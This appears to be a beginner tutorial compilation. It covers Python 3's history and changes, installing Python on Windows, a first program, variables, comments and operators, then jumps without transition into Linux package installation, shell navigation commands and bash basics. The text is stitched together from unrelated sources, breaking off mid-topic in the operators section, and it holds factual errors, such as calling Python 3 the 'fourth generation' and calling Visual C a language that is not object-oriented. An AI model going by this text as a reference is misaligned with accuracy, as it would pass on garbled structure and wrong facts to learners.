The fourth generation of Python, Python 3.0, otherwise known as Py3K and Python 3000, was published on the 3rd of December, 2008. This version was designed to fix fundamental flaws in the design of the scripting language. A new major version number had to be made to implement the required changes, which could not be made while keeping full compatibility with the 2.x series, which was by this time redundant. The guiding rule for the creation of Python 3 was to limit the duplication of features by taking out old ways of processing things. Otherwise, Python 3 still followed the philosophy with which the previous versions were made. Albeit, as Python had evolved to accumulate new but redundant ways of programming alike tasks, Python 3.0 was emphatically targeted at quelling duplicative modules and constructs, in keeping with the philosophy of having one "and preferably only one" obvious way of doing things. Regardless of these changes, though, version 3.0 remained a multi-paradigm language, even though it didn't share compatibility with its predecessor. The lack of compatibility meant Python 2.0 code could not be run on Python 3.0 without proper modifications. The dynamic typing used in Python, as well as the intention to change the semantics of certain methods of dictionaries, for instance, made a perfect mechanical conversion from the 2.x series to version 3.0

very challenging. A tool named 2to3 was created to handle the parts of the translation which could be done automatically. It carried out its tasks quite successfully, even though an early review stated that the tool was incapable of handling certain aspects of the conversion process. Following the release of version 3.0, projects that required compatibility with both the 2.x and 3.x series were advised to keep a single code base for the 2.x series; releases for the 3.x platform, on the other hand, were to be produced via the 2to3 tool. For a long time, editing the Python 3.0 code directly was discouraged because it needed to be generated from code that ran on the 2.x series. Now, however, this is no longer necessary, because since 2012 the recommended method has been to create a single code base which can run under both the 2.x and 3.x series through compatibility modules.

Between December of 2008 and July of 2019, eight version updates were published under the Python 3.x series. The current version as of the 8th of July, 2019 is Python 3.7.4. Within this timeframe, many updates have been made to the programming language, including the addition of the new features mentioned below:

1. Print, which used to be a statement, was changed to an inbuilt function, making it relatively easier to swap in a module that uses a different print function, as well as regularizing the syntax. In the late versions of the 2.x series (Python 2.6 and 2.7), print is available as a built-in function, but is concealed by the print statement syntax, which can be disabled by entering the following line of code at the top of the file: from __future__ import print_function
2. The [input] function of the Python 2.x series was removed, and the [raw_input] function was renamed to [input]. The change was such that the [input] function of Python 3 behaves like the [raw_input] function of the Python 2.x series, meaning input is always returned in the form of a string instead of being evaluated as an expression.
3. [reduce] was moved out of the built-in namespace into [functools], while [map] and [filter] were exempted and remain built-ins. The reason behind this change is that operations involving [reduce] are better expressed with an accumulation loop.
4. Added support was provided for optional function annotations, which can be used for informal type declarations as well as other purposes.
5. The [str]/[unicode] types were unified into a single type representing text, and a separate, immutable [bytes] type was introduced, along with a mostly corresponding mutable [bytearray] type; both of these represent arrays of bytes.
6. Backward-compatibility features, such as implicit relative imports, old-style classes, and string exceptions, were taken out.
7. The integer division functionality was changed. For instance, in the Python 2.x series, 5/2 equals 2, while in the 3.x series, 5/2 equals 2.5. In the recent versions of the 2.x series, beginning from version 2.2, up until Python 3: 5//2 equals 2.

In contemporary times, releases in the 3.x series have all been equipped with substantial new features, and all ongoing development on Python is being done in line with the 3.x series.
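A few of the changes listed above can be seen directly in a short Python 3 sketch (the values here are illustrative):

```python
# Python 3 sketch of some of the changes listed above.
from functools import reduce  # reduce moved out of the built-in namespace

# print is now a function, so parentheses are required.
print("Hello from Python 3")

# reduce expressed over a list (an accumulation loop would also work).
total = reduce(lambda a, b: a + b, [1, 2, 3, 4])
print(total)     # 10

# True division vs floor division.
print(5 / 2)     # 2.5 in Python 3
print(5 // 2)    # 2, as in Python 2.2 and later
```

Running this under any Python 3 interpreter prints the greeting, 10, 2.5, and 2, matching items 1, 3, and 7 above.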

C. HOW TO DOWNLOAD AND INSTALL PYTHON

In this time and age, being techy is a demand of the times, and the lack of such knowledge classifies one as an outsider. This can result in being left out of the career world, especially in the field of programming. Numerous big-shot companies have employed their own programmers for purposes of branding, and to cut back on IT expenses. In the world of programming, the Python language is found to be easier and more programmer-friendly; thus, its universal use.

Discussed below is information on how to download Python for MS Windows. In this particular demo, we have chosen Windows because it's the most common worldwide, even in less developed countries. We want to cater to the programming needs of everyone all over the globe. The Python 2.7.17 version was selected because this version bridges the gap between the old version 2 and the new version 3. Some of the updated functions/applications of version 3 are still not compatible with some devices, so 2.7.17 is a smart choice.

Steps in downloading Python 2.7.17 and installing it on Windows

1. Type python in your browser and press the Search button to display the search results. Scroll down to find the item you are interested in. In this instance, you are looking for Python. Click "Python Releases for Windows", and a new page opens. See image below:

2. Select the Python version, Python 2.7.17, and click; or you can select the version that is compatible with your device or OS.

3. The new page contains the various Python installer types. Scroll down and select an option; in this instance, select Windows x86 MSI installer and click.

4. Press the Python box at the bottom of your screen. Click the "Run" button, and wait for the new window to appear.
5. Select the user options that you require and press "NEXT". Your screen will display the hard drive where your Python will be located.

6. Press the "NEXT" button.
7. Press yes, and wait for a few minutes. Sometimes it can take longer for the application to download, depending on the speed of your internet.
8. After that, click the FINISHED button to signify that the installation has been completed.

Your Python has been installed on your computer and is now ready to use. Find it in drive C, or wherever you have saved it. There can be glitches along the way, but there are options presented here; if you follow them well, there is no reason you cannot perform this task. It's important to note that there's no need to compile programs. Python is an interpreted language and can execute your commands quickly. You can also download Python directly from the Python website by selecting either of these versions, 3.8.1 or 2.7.17, and clicking 'download.'

See image below:

Follow the step-by-step instructions prompted by the program itself. Save and run the program on your computer.

For Mac

To download Python on a Mac, you can follow a similar procedure, but this time, you will have to access the "Python.mpkg" file to run the installer.

For Linux

On Linux, Python 2 and 3 may have been installed by default. Hence, first check your operating system. You can check whether your device already has a Python program by accessing your command prompt and entering: python --version, or python3 --version. If Python is not installed on your Linux system, the result "command not found" will be displayed. You may want to download both Python 2.7.17 and one of the versions of Python 3 for your Linux system, since Linux can have more compatibility with Python 3.

For Windows users, now that you have downloaded the program, you're ready to start. And yes, congratulations! You can now begin working and having fun with your Python programming system.

Writing The First Python Program

Beginners may find it difficult to start using Python. It's a given, and nothing's wrong with that. However, your desire to learn will make it easier for you to gradually become familiar with the language. Here are the specific steps you can follow to start using Python.

Steps in using Python

Step #1 – Read all about Python. Python has included a README file in your downloaded version. It's advisable to read it first, so you will learn more about the program. You can start using your Python through the command box (black box), or you can go to your saved file and read the README file first by clicking it. See image below:

This box will appear.

You can read the content completely if you want to understand more about what the program is all about, the file setup, and similar information. This is a long document that informs you of how to navigate and use Python. Also, Python welcomes new contributions for its further development. You can copy-paste the content of the box into a Word document for better presentation. If you don't want to know all the other information about Python and you're raring to go, you can follow these next steps.

Step #2 – Start using Python. First open the Python file you have saved on your computer. Click on Python as shown below. In some versions, you just click 'python' for the shell to appear.

See image below:

You can start using Python by utilizing the simplest function, which is 'print'. It's the simplest statement or directive of Python: it prints a line or string that you specify. In Python 2, the print command may or may not be enclosed in parentheses, while in Python 3 you have to enclose the text for print in parentheses.

Example for Python 2: print "Welcome to My Corner."

Example for Python 3: print ("Welcome to My Corner")
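On Python 3, the example can be typed exactly as shown here; the quotes delimit the string and the parentheses enclose the function's argument:

```python
# Python 3 form: print is a function, so parentheses are required.
print("Welcome to My Corner")
```

Typing this into the shell and pressing Enter displays the line Welcome to My Corner.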

The image below shows what appears when you press ‘enter’.

You may opt to use a Python shell through idle. If you do, this is how it would appear:

In the Python 3.5.2 version, the text colors are: function (purple), string (green), and the result (blue). The string is composed of the words inside the brackets ("Welcome to My Corner"), while the function is the command word outside the brackets (print). Take note that the image above is from the Python 2.7.12 version.

You have to use indentation for your Python statements/codes. The standard Python code uses four spaces. The indentations are used in place of braces to mark blocks. In some programming languages, you usually put a semi-colon at the end of each command; in Python, you don't need to add a semi-colon at the end of a statement. In Python, semi-colons are used to separate multiple statements placed on a single line.
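As a small sketch (assuming Python 3, with illustrative values), here is how four-space indentation marks a block, and how a semi-colon separates two statements placed on one line:

```python
x = 7
if x > 5:
    print("big")       # indented four spaces: this line belongs to the if-block
else:
    print("small")

a = 1; b = 2           # a semi-colon separating two statements on one line
print(a + b)           # 3
```

Removing or changing the indentation of the print lines inside the if/else would change which block they belong to, or raise an IndentationError.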

For version 3, click on your downloaded Python program and save the file on your computer. Then click on IDLE (Integrated Development and Learning Environment), and your shell will appear. You can now start using your Python. It's preferable to use IDLE, so that your codes can be interpreted directly by IDLE.

Alternative method to open a shell (for some versions). An alternative method to use your Python is to open a shell through the following steps:

Step #1 – Open your menu. After downloading and saving your Python program on your computer, open your menu and find your saved Python file. You may find it in the downloaded files of your computer or in the folder where you saved it.

Step #2 – Access your Python file. Open your saved Python file (Python 27) by double clicking it. The contents of Python 27 will appear. Instead of clicking on Python directly (as shown above), click on Lib instead.

See image below.

This will appear:

Step #3–Click on ‘idlelib’.

Clicking the ‘idlelib’ will show this content:

Step #4–Click on idle to show the Python shell. When you click on any of the ‘idle’ displayed on the menu, the ‘white’ shell will be displayed, as shown below:

The difference between the three 'idle' menu entries is that the first two 'idle' commands have the black box (shell) too, while the last 'idle' has only the 'white' box (shell). I prefer the third 'idle' because it's easy to use.

Step #5 – Start using your Python shell.

You can now start typing Python functions, using the shell above. You may have noticed that there are various entries in the contents of each of the files that you have opened. You can click and open all of them as you progress in learning more about your Python programming. Python is a programming language that students have studied for several days or months. Thus, what's presented in this book are the basics for beginners. The rest of the illustrations will assume you are running the Python programs in a Windows environment.

1. Start IDLE
2. Navigate to the File menu and click New Window
3. Type the following: print("Hello World!")
4. On the File menu, click Save. Type the name myProgram1.py
5. Navigate to Run and click Run Module to run the program.

The first program that we have written is known as "Hello World!" and is used not only to provide an introduction to a new computer coding language but also to test the basic configuration of the IDE. The output of the program is "Hello World!" Here is what has happened: print() is an inbuilt function, prewritten and preloaded for you, used to display whatever is contained in the () as long as it is between the double quotes. The computer will display anything written within the double quotes.

Practice Exercise: Now write and run the following Python programs:
✓ print("I am now a Python Language Coder!")
✓ print("This is my second simple program!")
✓ print("I love the simplicity of Python")

✓ print("I will display whatever is here in quotes such as owyhen2589gdbnz082")

Now we need to write a program with numbers, but before writing such a program we need to learn something about variables and types. Remember, Python is object-oriented and it is not statically typed, which means we do not need to declare variables before using them or specify their type. Let us explain this statement. An object-oriented language simply means that the language supports viewing and manipulating real-life scenarios as groups with subgroups that can be linked and shared, mimicking the natural order and interaction of things. Not all programming languages are object-oriented; for instance, the Visual C programming language is not object-oriented.

In programming, declaring variables means that we explicitly state the nature of the variable. The variable can be declared as an integer, long integer, short integer, floating-point number, a string, or a character, including whether it is accessible locally or globally. A variable is a storage location that changes values depending on conditions. For instance, number1 can take any number from 0 to infinity. However, if we specify explicitly that int number1, it means that the storage location will only accept integers and not fractions, for instance. Fortunately or unfortunately, Python does not require us to explicitly state the nature of the storage location (declare variables), as that is left to the Python language itself to figure out.

Before tackling types of variables and rules of writing variables, let us run a simple program to understand what variables are when coding a Python program.

✓ Start IDLE
✓ Navigate to the File menu and click New Window
✓ Type the following:

num1=4
num2=5
sum=num1+num2
print(sum)

✓ On the File menu, click Save. Type the name myProgram2.py
✓ Navigate to Run and click Run Module to run the program.

The expected output of this program should be 9, without any quotes.

Discussion

At this point, you are eager to understand what has just happened and why print(sum) does not have double quotes like the first programs we wrote. Here is the explanation. The first line, num1=4, means that variable num1 (our shortened way of writing number1, first number) has been assigned 4 before the program runs. The second line, num2=5, means that variable num2 (our shortened way of writing number2, second number) has been assigned 5 before the program runs. The computer interprets these instructions and stores the numbers given. The third line, sum=num1+num2, tells the computer to take

whatever num1 has been given and add it to whatever num2 has been given. In other terms, sum the values of num1 and num2. The fourth line, print(sum), means: display whatever sum has. If we put double quotes around sum, the computer will simply display the word sum and not the sum of the two numbers! Remember that cliché that computers are garbage in, garbage out. They follow what you give them!

Note: + is an operator for summing variables and has other uses.

Now let us try out three exercises involving numbers before we explain types of variables and rules of writing variables, so that you get more freedom to play with variables. Remember, variables' values vary; for instance, num1 can take 3, 8, 1562, or 1. Follow the steps of opening the Python IDE and do the following:

✓ The output should be 54

num1=43
num2=11
sum=num1+num2
print(sum)

✓ The output should be 167

num1=101
num2=66
sum=num1+num2
print(sum)

✓ The output should be 28

num1=9
num2=19
sum=num1+num2
print(sum)

1. Variables

We have used num1, num2, and sum, and the variable names were not just random: they must follow certain rules and conventions. Rules are what we cannot violate, while conventions are much like the recommended way. Let us start with the rules.

The Rules When Naming Variables in Python
1. Variable names should always start with a letter or an underscore, i.e. num1, _num1
2. The remaining part of the variable name may consist of numbers, letters, and underscores, i.e. number1, num_be_r
3. Variable names are case sensitive, meaning that capital letters and non-capital letters are treated differently. Num1 will be treated differently from num1.
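The case-sensitivity rule can be demonstrated in a short sketch (the names and values here are illustrative): Num1 and num1 are two different storage locations.

```python
num1 = 5        # starts with a letter: valid
Num1 = 50       # same letters, different case: a separate variable
_num1 = 500     # starting with an underscore is also valid

print(num1, Num1, _num1)   # three distinct values: 5 50 500
```

If case did not matter, the later assignments would have overwritten num1; instead, all three names keep their own values.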

Practice Exercise

Write/suggest five variables for:
✓ Hospital department.
✓ Bank.
✓ Media House.

Given scri=75, scr4=9, sscr2=13, Scr=18
✓ The variable names above are supposed to represent scores of students. Rewrite the variables to satisfy Python variable rules and conventions.

2. Conventions When Naming Variables in Python

As earlier indicated, conventions are not rules per se; they are established traditions that add value and readability to the way we name variables in Python.
❖ Uphold readability. Your variables should give a hint of what they are handling, because programs are meant to be read by other people besides the person writing them. number1 is easy to read compared to n1. Similarly, first_name is easy to read compared to firstname, firstName, or fn. The implication is that both forms are valid/acceptable variable names in Python, but convention urges us to write them in an easy-to-read form.
❖ Use descriptive names when writing your variables. For instance, number1 as a variable name is descriptive compared to yale or mything. In other words, we can use yale to capture values for number1, but the name does not outright hint at what we are doing. Remember, when writing programs, assume another person will maintain them. The person should be able to quickly figure out what the program is all about before running it.
❖ Avoid the uppercase letter 'O', the lowercase letter 'l', and the uppercase letter 'I', because they can be confused with numbers. Using these letters does not violate the rules of writing variables, but their inclusion as variable names breeds confusion.
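As a sketch of these conventions (the names here are illustrative, not from any particular program), compare a readable, descriptive name with a valid but cryptic one:

```python
# Descriptive, underscore-separated names are easy to read.
first_name = "Ada"
score_total = 18 + 21

# Valid but unhelpful: the name gives no hint of its purpose.
yale = 18 + 21

print(first_name, score_total)   # Ada 39
```

Both score_total and yale hold the same value; only the first tells a maintainer what the value means.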

Practice Exercise 1

Re-write the following variable names to (1) be valid variable names and (2) follow the conventions of writing variable names.
✓ 23doctor
✓ line1
✓ Option3
✓ Mydesk
✓ #cup3

Practice Exercise 2

Write/suggest variable names that are (1) valid and (2) conventional.
✓ You want to sum three numbers.
✓ You want to store the names of four students.
✓ You want to store the names of five doctors in a hospital.

3. Keywords and Identifiers in Python Programming Language

At this point, you may have been wondering why you must use print and str in that manner, without the freedom or knowledge of why the stated words have to be written that way. The words print and str constitute a special type of words that always have to be written the same way. Each programming language has its set of keywords, and in most cases some keywords are found across several programming languages. Keywords are case sensitive in Python, meaning that we have to type them in their exact form. Keywords cannot be used as the name of a function (we will explain what that is later) or the name of a variable. There are 33 keywords in Python, and all are in lowercase save for

None, False, and True. They must always be written exactly as they appear.
Note: print() and str are functions, but they are inbuilt/preloaded functions in Python. Functions are named blocks of code that act when invoked; for instance, the print function displays output when it is activated/invoked/called. At this point, you have not encountered all of the keywords, but you will meet them gradually. Take time to skim through, read, and try to recall as many as you can.
Practice Exercise
Identify what is wrong with the following variable names (the exercise requires recalling what we have learned so far):
✓ for=1
✓ yield=3
✓ 34ball
✓ m
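Python can list its own keywords through the standard keyword module; a quick sketch (the exact list depends on your Python version):

```python
import keyword

# Print every reserved word in this Python version.
print(keyword.kwlist)

# Keywords are case sensitive: 'True' is a keyword, 'true' is not.
print(keyword.iskeyword("for"))    # -> True
print(keyword.iskeyword("True"))   # -> True
print(keyword.iskeyword("true"))   # -> False
```

This also explains the exercise above: for and yield are keywords, so they cannot be used as variable names.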

4. Comments and Statements
Statements in Python
A statement in Python refers to an instruction that the Python interpreter can work on/execute. Examples are str='I am a Programmer' and number1=3. A statement containing an equal sign (=) is known as an assignment statement. There are other types of statements, such as if, while, and for, which will be handled later.
Practice Exercise
✓ Write a Python statement that assigns the first number a value of 18.
✓ Write a programming statement that assigns the second number a value of 21.
✓ What type of statements are a. and b. above?
5. Multi-Line Python Statement
It is possible to spread a statement over multiple lines. Such a statement is known as a multi-line statement. The termination of a programming statement is denoted by a newline character. To spread a statement over several lines in Python, we use the backslash (\), known as the line continuation character. An example of a multi-line statement is:
sum=3+6+7+\
9+1+3+\
11+4+8
The example above is also known as explicit line continuation. In Python, line continuation is implied inside square brackets [], parentheses/round brackets (), and braces {}. The above example can be rewritten as:
sum=(3+6+7+
9+1+3+
11+4+8)
Note: We have dropped the backslash (\), the line continuation character, when using the parentheses (round brackets), because the parentheses do the work the line continuation character was doing.
Question: Why are multi-line statements necessary when we can simply write a single line and the program statement will run just fine?
Answer: Multi-line statements can help improve the formatting/readability of the entire program. Remember, when writing a program, always assume that other people will use and maintain it without your input.
Practice Exercise
Rewrite the following program statements using line continuation, either \ or implicit continuation inside (), [] or {}, to improve the readability of the program statements:
total=2+9+3+6+8+2+5+1+14+5+21+26+4+7+13+31+24
count=13+1+56+3+7+9+5+12+54+4+7+45+71+4+8+5
Semicolons are also used when creating multiple statements on a single line. Assume we have to assign and display the ages of four employees in a Python program. The assignments could be written as:
employee1=25; employee2=45; employee3=32; employee4=43
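The continuation styles described above can be tried directly; a minimal sketch (sum1/sum2 are used instead of sum to avoid shadowing the built-in sum function):

```python
# Explicit line continuation with the backslash.
sum1 = 3 + 6 + 7 + \
       9 + 1 + 3 + \
       11 + 4 + 8

# Implicit continuation inside parentheses (no backslash needed).
sum2 = (3 + 6 + 7 +
        9 + 1 + 3 +
        11 + 4 + 8)

# Multiple statements on one line, separated by semicolons.
employee1 = 25; employee2 = 45; employee3 = 32; employee4 = 43

print(sum1)  # -> 52
print(sum2)  # -> 52
```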

6. Indentation in Python
Indentation is used to group program lines into a block in Python. The amount of indentation to use depends entirely on the programmer; however, it is important to ensure consistency. By convention, four whitespaces are used for indentation instead of tabs.
Indentation in Python also helps make the program look neat and clean, and it creates consistency. However, indentation can be relaxed when performing line continuation. Incorrect indentation will create an indentation error. A Python program with legal but inconsistent indentation will still run, but it will not be neat and consistent from a human readability point of view.
7. Comments in Python
When writing Python programs, and indeed in any programming language, comments are very important. Comments are used to describe what is happening within a program. It becomes easier for another person taking a look at a program to get an idea of what the program does by reading the comments in it. Comments are also useful to the programmer, as one can forget the critical details of a program one has written. The hash (#) symbol is used before writing a comment in Python, and the comment extends up to the newline character. The Python interpreter ignores comments; they are meant for programmers to understand the program better.
Example
Start IDLE.
Navigate to the File menu and click New Window.
Type the following:
#This is my first comment
#The program will print Hello World

print('Hello World') #This is an inbuilt function to display output
On the File menu, click Save. Type the name myProgram5.py
Navigate to Run and click Run Module to run the program.
Practice Exercise
This exercise integrates most of what we have covered so far.
✓ Write a program to sum the two numbers 45 and 12, and include a single-line comment at each line of code.
✓ Write a program to show the names of two employees, where the first employee is "Daisy" and the second employee is "Richard". Include single-line comments at each line of code.
✓ Write a program to display the student registration numbers, where the student names and their registration numbers are: Yvonne=235, Ian=782, James=1235, Juliet=568.
Multi-Line Comments
Just like multi-line program statements, we also have multi-line comments. There are several ways of writing multi-line comments. The first approach is to type the hash (#) at the start of each comment line. For example:
Start IDLE.
Navigate to the File menu and click New Window.
Type the following:
#I am going to write a long comment line
#the comment will spill over to this line
#and finally end here.
The second way of writing multi-line comments involves using triple single or double quotes: ''' or """. For multi-line strings and multi-line comments in Python, we use the triple quotes.
Caution: When used as docstrings they will generate extra bytecode, but we do not have to worry about this at this instance.
Example:
Start IDLE.
Navigate to the File menu and click New Window.
Type the following:
"""This is also a great illustration
of a multi-line comment in Python"""
Summary
Variables are storage locations that a user specifies before writing and running a Python program. Variable names are labels for those storage locations. A variable holds a value depending on circumstances. For instance, doctor1 can be Daniel, Brenda, or Rita; patient1 can be Luke, William, or Kelly. Variable names are written by adhering to rules and conventions. Rules are a must, while conventions are optional but recommended, as they help write readable variable names. When writing a program, you should assume that another person will examine or run it without your input, and it should therefore be well written. In programming, declaring variables means that we explicitly state the nature of the variable. A variable can be declared as an integer, long integer, short integer, floating-point number, string, or character, including whether it is

accessible locally or globally. A variable is a storage location that changes values depending on conditions. Use descriptive names when writing your variables.

The Python Operators

While we are here, we want to look at the topic of the Python operators and what they can do for our code. As you work through the code a beginner writes with this guidebook, you will find that these operators are quite common and that we use them on a regular basis. There are a number of operators, but we can split them up into a few different types based on our needs. Some of the different operators that we can work with include:
1. The arithmetic operators. These are the ones that allow you to complete mathematical operations inside of your code, such as addition or subtraction. You can simply add together two operands, or two parts of the code, subtract them, multiply them, or divide them, and work from there.

These can be used in many of the different programs that you will want to write along the way. Some of the options that you can use with the arithmetic operators include:
1. (+): this is the addition operator, and it is responsible for adding together both of your values.
2. (-): this is the subtraction operator, and it is responsible for taking the right operand and subtracting it from the left.
3. (*): this is the multiplication operator, and it is used to multiply two or more values in the equation.
4. (/): this is the division operator, and it divides the value of the left operand by the value of the right operand and gives you the answer.
2. Comparison operators: We can also work with the comparison operators. These are a good option when we would like to take two or more parts of the code, such as statements or values, and compare them with one another. They rely on Boolean expressions, because each comparison evaluates to a true or false answer. So, the statements that you compare will be either true or false based on how they compare.
1. (>=): this one checks whether the operand on the left is greater than or equal to the value of the one on the right.
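A short sketch of both operator families; the operand values here are arbitrary examples:

```python
left = 12
right = 4

# Arithmetic operators
print(left + right)   # addition -> 16
print(left - right)   # subtraction -> 8
print(left * right)   # multiplication -> 48
print(left / right)   # division -> 3.0 (Python 3 division yields a float)

# Comparison operators evaluate to Boolean values
print(left >= right)  # -> True
print(left > right)   # -> True
```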

2. (>): this one checks whether the value on the left side is greater than the value on the right side of the code.
3. (<): this one checks whether the value on the left side is less than the value on the right side.
4. (<=): this one checks whether the value on the left side is less than or equal to the value on the right side.

Administration -> Synaptic Package Manager
When you get to this point, you need to search for the package that you require. In this example, the package shall be called comp. Next, you should install the package using the command line as follows:
sudo apt-get install comp
Linux also has another advantage over some popular operating systems: the ability to install more than one package at a time, without having to complete one process after another in separate windows. It all comes down to what information is entered on the command line. An example of this is as follows:
sudo apt-get install comp beta-browser
There are even more advantages (other than convenience) to being able to install multiple packages. In Linux, these advantages include updating. Rather than updating each application one at a time, Linux allows all the applications to be updated simultaneously through the update manager. The Linux repository is diverse, and a proper search through it will help you to identify a large variety of apps that you will find useful. Should there be an application that you need which is not available in the repository, Linux will

give you instructions on how you can add separate repositories.
The Command Line
Using Linux allows you to customize your system to fit your needs. For those who are not tech savvy, the distribution's settings are a good place to change things until you get what you want. However, you could spend hours fiddling with the available settings and still fail to find a setup that is perfect for you. Luckily, Linux has a solution, and that comes in the form of the command line.
Even though the command line sounds complex, like something that can only be understood by a tech genius, it is quite simple to learn, and when you adjust things in your operating system using the command line, the sky is the limit and creativity can abound.
To begin, you need to use "the shell". This is basically a program which takes in commands from your keyboard and ensures that the operating system performs those commands. You will also need to start a "terminal". A terminal is also a program, and it allows you to interact with the shell. To start a terminal, you should select the terminal option from the menu. In this way, you gain access to a shell session and can begin practicing your commands.
In your shell session, you should see a shell prompt. Within this shell prompt you will see your username and the name of the machine that you are using, followed by a dollar sign. It will appear as follows:
[me@linuxbox me]$
If you try to type something random under this shell prompt, you will see a message from bash. For example:
[me@linuxbox me]$ lmnopqrst
bash: lmnopqrst: command not found
This is an error message where the system lets you know that it is unable to comprehend the information you put in. If you press the up-arrow key, you will find that you can go back to your previous command, the lmnopqrst one. If you press the down-arrow key, you will find yourself on a blank line.
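You can reproduce that error message safely; the nonsense command name below is deliberate:

```shell
# Ask the shell to run a command that does not exist.
# The "|| true" keeps the snippet's overall exit status at 0.
lmnopqrst || true
# bash prints something like: bash: lmnopqrst: command not found
```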

This is important to note because you can then see how you end up with a command history. A command history makes it easier for you to retrace your steps and make corrections as you learn how to use the command prompt.
Command Lines for System Information
The most basic and perhaps most useful commands are those that give you system information. To start, you can try the following:
Command for Date
This command displays the current date and time:
root@kali:~# date
Thu May 21 12:31:29 IST 2015
Command for Calendar
This command displays the calendar of the current month, or any other month that you specify:
root@kali:~# cal
Command for uname
This command stands for Unix Name, and it provides detailed information about the name of the machine, its operating system, and the kernel.
Navigating Linux Using Command Lines
You can use commands in the same way that you would use a mouse: to easily navigate through your Linux operating system so that you can complete the tasks you require. In this section, you will be introduced to the most commonly used commands.
Finding files in Linux is simple: just as they are arranged in order in familiar Windows programs, they follow a hierarchical directory structure. This structure resembles a list of folders and is referred to as directories. The primary directory within a file system is referred to as the root directory. In it, you will find files, and subdirectories which can contain additional sorted files. All files are stored under a single tree, even if there are several storage devices.
pwd

pwd stands for print working directory. Command lines do not give any graphical representation of the filing structure; however, when using a command-line interface, you can view all the files within a parent directory and all the pathways that may exist in a subdirectory. This is where pwd comes in. Whichever directory you are currently standing in is your working directory. The moment you log onto your Linux operating system, you arrive in your home directory (which is your working directory while you are in it). In this directory, you can find all your files. To identify the name of the directory that you are in, use the following pwd command:
[me@linuxbox me]$ pwd
/home/me
You can then begin exploring within the directory by using the ls command. ls stands for list files in the directory. Therefore, to view all the files that are in your working directory, type in the following command and you will see results as illustrated below:
[me@linuxbox me]$ ls
Desktop    GNUstep    bin    ndeit.rpm    linuxcmd    nsmail

cd
cd stands for change directory. This is the command that you need to use when you want to switch from your working directory and view other files. To use this command, you need to know the pathname of the directory that you want to make your working directory. There are two different types of pathnames for you to discern: the absolute pathname and the relative pathname. An absolute pathname is one that starts at your root directory and, by following a file path, leads you to your desired directory. Suppose the absolute pathname for a directory is /usr/bin. There is a directory known as usr, and another directory within it named bin. If you want to use the cd command with this absolute pathname, you should type in the following:
[me@linuxbox me]$ cd /usr/bin
[me@linuxbox me]$ pwd
/usr/bin
[me@linuxbox me]$ ls
When you enter this information, you will have changed your working directory to /usr/bin. You can use a relative pathname when you want to change from the new working directory, /usr/bin, to its parent directory, /usr. To execute this, you should type in the following:
[me@linuxbox me]$ cd ..
[me@linuxbox me]$ pwd
/usr
Using relative pathnames cuts down on the amount of typing that you must do on the command line; therefore, it is recommended that you learn as many of these as possible. When you access a file using Linux commands, you should note that they are case sensitive. Unlike the files you would find on Windows operating systems and programs, the files in Linux do not need file extensions. This is great because it gives you the flexibility of naming files anything that you like. One thing you need to be careful of are the application programs that you use: there are some that may automatically create extensions on files, and it is these that you need to watch out for.
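A short session putting pwd, cd, and ls together with absolute and relative paths (the listing you see will differ on your machine):

```shell
# Show the current (working) directory.
pwd

# Change to an absolute path, then confirm where we are.
cd /usr/bin
pwd          # prints /usr/bin

# Move to the parent directory using a relative path.
cd ..
pwd          # prints /usr

# List the files in the new working directory.
ls
```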

Chapter 7 Introduction to Linux Shell

Working effectively as a Linux professional is unthinkable without using the command line. The command line presents a shell prompt that indicates the system is ready to accept a user command. This can be seen as a dialogue between the user and the system. For each command entered, the user receives a response from the system:
1. another prompt, indicating that the command has executed and you can enter the next one, or
2. an error message, which is a statement from the system about events in it, addressed to the user.
For users who are accustomed to working in systems with a graphical interface, working with the command line may seem inconvenient. However, in Linux this type of interface has always been fundamental, and it is therefore well developed. The command shells used in Linux offer plenty of ways to save effort, that is, keystrokes, when performing the most common actions: automatic completion of long command or file names; searching for and re-executing a command performed earlier; substitution of file name lists by a pattern; and much more.
The advantages of the command line are especially obvious when you need to perform similar operations on a variety of objects. In a system with a graphical interface, you need as many mouse drags as there are objects; a single

command will be enough on the command line. This section describes the main tools that allow you to solve any user task using the command line: from trivial operations with files and directories, for example copying, renaming, and searching, to complex tasks requiring massive similar operations, which occur both in the user's application work, when working with large arrays of data or text, and in system administration.
Shells
A command shell, or command interpreter, is a program whose task is to transfer your commands to the operating system and application programs, and their answers back to you. In terms of its tasks, it corresponds to command.com in MS-DOS or cmd.exe in Windows, but functionally the shell in Linux is incomparably richer. In the command shell language, you can write small programs, called scripts, that perform a series of sequential operations on files and the data they contain.
Having logged into the system by entering a username and password, you will see a command-line prompt, a line ending in $. Later this symbol will be used to denote the command line. If a graphical user interface was configured during installation to start at system boot, you can still get to the command line on any virtual text console by pressing Ctrl-Alt-F1 through Ctrl-Alt-F6, or by using any terminal-emulation program, for example xterm.
The following shells are commonly available; they may differ depending on the distribution:
bash
The most common shell for Linux. It can complete the names of commands and files, keeps a history of commands, and provides the ability to edit them.
pdksh
A clone of the Korn shell, well known on UNIX systems.
sash
The peculiarity of this shell is that it does not depend on any shared libraries

and includes simplified implementations of some of the most important utilities, such as ls, dd, and gzip. The sash is therefore especially useful when recovering from system crashes or when upgrading the most important shared libraries.
tcsh
An improved version of the C shell.
zsh
The newest of the shells listed here. It implements advanced autocompletion of command arguments and many other functions that make working with the shell even more convenient and efficient. Note, however, that all zsh extensions are disabled by default, so before you start using this command shell, you need to read its documentation and enable the features that you need.
The default shell is bash (Bourne Again Shell). To check which shell you are using, type the command: echo $SHELL.
Shells differ from each other not only in capabilities but also in command syntax. If you are a novice user, we recommend that you use bash; the further examples describe work in this particular shell.
Bash shell
The command line in bash is composed of the name of the command, followed by keys (options), instructions that modify the behavior of the command. Keys begin with the character - or --, and often consist of a single letter. In addition to keys, arguments (parameters) can follow the command: the names of the objects on which the command must be executed (often the names of files and directories).
Entering a command is completed by pressing the Enter key, after which the command is transferred to the shell for execution. As a result of the command's execution, messages about the execution or errors may appear on the user's terminal, and the appearance of the next command-line prompt (ending with the $ character) indicates that the command has completed and you can enter the next one.
There are several techniques in bash that make it easier to type and edit the command line. For example, using the keyboard, you can:

Ctrl-A: go to the beginning of the line (the Home key does the same);
Ctrl-U: delete the current line;
Ctrl-C: abort the execution of the current command.
You can use the semicolon (;) in order to enter several commands on one line. bash records the history of all commands executed, so it is easy to repeat or edit one of the previous commands. To do this, simply select the desired command from the history: the up-arrow key displays the previous command, the down-arrow key the next one. In order to find a specific command among those already executed, without flipping through the whole history, type Ctrl-R and enter some keyword used in the command you are looking for. Commands that appear in the history are numbered. To run a specific command, type:
!command_number
If you enter !!, the last command typed is run again.
